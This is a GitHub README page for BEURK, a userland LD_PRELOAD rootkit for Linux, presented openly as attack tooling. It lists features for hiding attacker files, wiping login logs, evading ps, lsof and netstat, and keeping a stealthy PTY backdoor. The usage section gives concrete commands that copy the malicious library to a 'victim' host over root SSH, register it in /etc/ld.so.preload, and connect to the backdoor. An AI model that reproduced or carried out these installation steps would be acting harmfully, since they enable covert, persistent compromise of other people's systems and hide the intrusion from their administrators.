8000 GitHub - CrackerCat/beurk: BEURK Experimental Unix RootKit
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

CrackerCat/beurk

 
 

Repository files navigation

BEURK

Getting Started | API Documentation | Contributing | TODO List

Travis Build Ready Issues Coverage Status Jenkins Build Join the chat at https://gitter.im/unix-thrust/beurk

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

S'ils savaient, ils vomiraient ...

- The core team -


Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage

  • Compile
    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
  • Install
    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Enjoy !
    ./client.py victim_ip:port # connect with furtive backdoor

Dependencies

The following packages are not required in order to build BEURK at the moment:

  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection

Example on debian:

    apt-get install libpcap-dev libpam-dev libssl-dev

< 5845 img src="https://camo.githubusercontent.com/c2a539a872a6c36332c7f1511843b8d02710c7eab020150ca26fa4edbc10ab88/68747470733a2f2f6772617068732e776166666c652e696f2f756e69782d7468727573742f626575726b2f7468726f7567687075742e737667" alt="Waffle metrics" data-canonical-src="https://graphs.waffle.io/unix-thrust/beurk/throughput.svg" style="max-width: 100%;">

NOTE: BEURK is a recursive acronym for BEURK Experimental Unix Root Kit


About

BEURK Experimental Unix RootKit

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 61.7%
  • Python 24.6%
  • Shell 9.2%
  • Makefile 4.5%
0